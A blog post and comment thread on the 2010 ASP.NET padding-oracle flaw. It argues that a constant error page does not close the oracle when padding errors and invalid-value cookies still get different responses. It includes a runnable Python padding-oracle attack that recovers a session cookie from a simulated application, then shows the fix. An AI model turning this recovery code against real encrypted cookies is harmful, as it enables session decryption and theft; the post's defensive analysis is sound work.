Tuesday, September 21, 2010

ASP.NET Vulnerability Workaround Not Enough

Microsoft keeps calling this a ‘workaround’, but it is a mitigation at best. For the majority of applications it may be all that’s necessary, but it falls short of across-the-board prevention. It’s not clear why they’re not more open about the cases the suggested workaround doesn’t cover, but it takes no more than simple reasoning to find them. If you’re really concerned about the security of your application, keep reading.

Let’s go back to basics and look at where this issue stems from. The oracle exists only because an attacker can differentiate between three cases.

When the application is passed an encrypted value (an encrypted cookie, say), it responds in one of three ways:

  • When a valid ciphertext is received (one that is correctly padded and decrypts to valid data), the application responds normally (200 OK)
  • When an invalid ciphertext is received (one that, when decrypted, does not end in valid padding), the application throws a cryptographic exception (500 Internal Server Error)
  • When a correctly padded ciphertext is received that nevertheless decrypts to an invalid value, the application displays a custom error message (200 OK)

The attack needs to tell the second case apart from the other two, and depending on how your application uses encryption, an attacker can still do that even with a constant error page. Here’s one blogger’s explanation, which gets close but misses the point, IMO:

How about Microsoft’s workaround?

Well, while the workaround contains really valuable information, relevant for every system (about not disclosing the real error), and it will prevent the automated tool released by the researchers from hacking your system, it will, by far, NOT protect you from a potential attack!

How so? The workaround assumes that the potential attacker will look for an HTTP error response status (500), or for an error page containing a specific exception message. However, it is enough for an attacker to recognize abnormal, or just different, system behaviour on certain requests.

Let’s get back to our ASP.NET system that stores encrypted sensitive information in a cookie. On each request, the system will probably decrypt this information and use it. In case the ciphertext in the cookie is invalid, an exception will be thrown, and the system may act according to one of the following scenarios:

· Return a 500 error response - very user unfriendly!

· Return a default ASP.NET YSOD exception page - extremely bad in a production environment!

· Return a page stating only the exception’s message - also very bad!

· Return a constant page, stating there was an error, without providing details - a good practice; this is actually Microsoft’s workaround

· “Swallow” the exception, and behave as if the cookie does not exist. The response may be a redirect to another page, or just slightly changed HTML (instead of the user’s name, a “login” link) - this is the way ASP.NET Forms Authentication works.

Note that every one of the possible responses is different from the normal one. Even the last scenario I’ve described above, as clean as it is, still returns a distinctively different response. Therefore, an attacker can take advantage of it, and write a simple script that maps this abnormal behaviour to the oracle’s “invalid” answer. It is that simple!

That’s mostly right, except that it is not sufficient for the attacker to detect any error condition. The attacker needs to discern between two specific error conditions: a ciphertext that is not correctly padded versus one that is correctly padded but decrypts to an invalid value. An application that collapses both into one indistinguishable response has closed the oracle; one that answers them differently has not, no matter how bland each answer is on its own.

If visitors to your site can draw that distinction, you’re still vulnerable. Here’s a scenario: you don’t rely on Forms Authentication, but instead have a custom authentication scheme built on encrypted cookies. If a cookie decrypts cleanly but doesn’t contain a valid value, you treat the user as anonymous; but if an exception is thrown during decryption, Application_Error kicks in and serves the (constant) error page. This scenario, not entirely uncommon, still allows the attacker to replay the request with modified cookies and differentiate between the three possible replies.
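As an added example (not code from the original post, from Microsoft, or from the researchers), here is the whole argument in runnable Python: a simulated cookie-decrypting application that answers the three cases from the list above, the custom-authentication scenario from the previous paragraph in which a padding error still reaches Application_Error while a well-padded but invalid cookie yields the anonymous page, the fixed variant that swallows the exception, and the attacker’s script, which needs nothing more than “did the response differ from the error page?”. The block cipher is a toy Feistel construction built on HMAC-SHA256 so the file runs offline with only the standard library; it stands in for AES-CBC, and the key, the cookie contents, the `uid=` format and the page strings are all assumptions of the example.

```python
# Padding-oracle demo: constructed example, standard library only; toy Feistel cipher stands in for AES-CBC.
import hashlib
import hmac
import os

BLOCK = 16
KEY = b"assumed-demo-key"   # assumption of the example, not a real key

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(half: bytes, rnd: int) -> bytes:
    return hmac.new(KEY, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(block: bytes) -> bytes:   # 4-round Feistel keyed permutation
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(right, rnd))
    return left + right

def block_decrypt(block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(left, rnd)), left
    return left + right

def cbc_encrypt(plaintext: bytes) -> bytes:   # returns IV || CBC(PKCS#7-padded plaintext)
    pad = BLOCK - len(plaintext) % BLOCK
    data = plaintext + bytes([pad]) * pad
    prev = os.urandom(BLOCK)
    out = [prev]
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(_xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(cookie: bytes) -> bytes:
    """ValueError here is the 'cryptographic exception' of case 2."""
    if len(cookie) % BLOCK or len(cookie) < 2 * BLOCK:
        raise ValueError("bad length")
    blocks = [cookie[i:i + BLOCK] for i in range(0, len(cookie), BLOCK)]
    data = b"".join(_xor(block_decrypt(c), p) for p, c in zip(blocks, blocks[1:]))
    pad = data[-1]
    if not 1 <= pad <= BLOCK or data[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding")
    return data[:-pad]

ERROR_PAGE = "200 OK: constant error page"   # the workaround's generic page
ANON_PAGE = "200 OK: anonymous page"

def app(cookie: bytes, swallow_padding_error: bool) -> str:
    """Custom cookie auth. swallow=False: a padding error reaches Application_Error
    (the scenario in the post). swallow=True: the fix, answer as for a bad value."""
    try:
        session = cbc_decrypt(cookie)
    except ValueError:
        if not swallow_padding_error:
            return ERROR_PAGE                  # case 2 stays distinguishable
        session = b""
    if session.startswith(b"uid="):            # case 1: valid value
        return "200 OK: welcome " + session[4:].split(b";")[0].decode(errors="replace")
    return ANON_PAGE                           # case 3: well padded, invalid value

def recover_block(prev: bytes, target: bytes, oracle):
    """Standard padding-oracle recovery of one block; None when the oracle is silent."""
    inter, plain = bytearray(BLOCK), bytearray(BLOCK)   # inter = D_k(target)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad          # bytes after pos decrypt to `pad`
        hits = []
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:                # rule out accidental 02 02, 03 03 03 ...
                check = bytearray(forged)
                check[pos - 1] ^= 0x80
                if not oracle(bytes(check) + target):
                    continue
            hits.append(guess)
        if len(hits) != 1:
            return None                         # every forgery looked alike: no oracle
        inter[pos] = hits[0] ^ pad
        plain[pos] = inter[pos] ^ prev[pos]
    return bytes(plain)

def attack(cookie: bytes, swallow_padding_error: bool):
    """The attacker asks only: did the response differ from the error page?"""
    oracle = lambda c: app(c, swallow_padding_error) != ERROR_PAGE
    blocks = [cookie[i:i + BLOCK] for i in range(0, len(cookie), BLOCK)]
    out = b""
    for prev, target in zip(blocks, blocks[1:]):
        block = recover_block(prev, target, oracle)
        if block is None:
            return None
        out += block
    return out[:-out[-1]]                       # strip the recovered PKCS#7 padding

if __name__ == "__main__":
    cookie = cbc_encrypt(b"uid=alice;role=admin")   # constructed session cookie
    print(attack(cookie, swallow_padding_error=False))   # b'uid=alice;role=admin'
    print(attack(cookie, swallow_padding_error=True))    # None
```

Run it and the first call recovers `uid=alice;role=admin` from the application whose error page is perfectly constant, because that page is still a different answer from the anonymous page. The second call returns None: once both failure modes produce the same anonymous page, every forged cookie looks alike and there is no oracle left. In a real application, squelching the exception is the minimum; the robust fix is to authenticate the ciphertext (a MAC checked before any decryption) so that a tampered cookie is rejected before padding is ever examined.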

How does your application respond in these scenarios and how confident are you of the answer?


Venemo said...

Hi Nariman,

As I see it, it is always possible to tell whether the cookie is valid or invalid. But after applying the workaround, the attacker needs to do *lots* of brute force to figure out the key.

(Because the attacker can't deduce from the responses whether the key itself is wrong or content.)

Actually, the correct solution would be to implement your own version of the FormsAuthenticationModule that encrypts the data inside the cookie with some different encryption method before sending it to the client. And the cookie itself should not contain the username, just a random GUID or something like that.

What do you think?

Nariman Haghighi said...

Hi Venemo;

If the application is susceptible in this way, the # of iterations doesn’t change after the workaround - each iteration still tells you whether there was a padding error or whether the cookie was rejected based on its value. Again, it depends on how the application was authored to respond to invalid cookies - some just chose to ignore it (and render an anonymous response). In these scenarios, if it's possible to squelch the padding exception and treat it the same as an invalid (but correctly padded) cookie (basically render the anonymous HTML for that page) that should suffice. Each scenario needs some thought – I’d like to set aside some time to actually experiment with a few patterns before coming to any strong conclusions.


Venemo said...

"each iteration still tells you whether there was a padding error or whether the cookie was rejected based on its value"

If the application sends the same error message for both (plus sleeps the thread for a random duration), I don't see how the attacker could tell the difference.
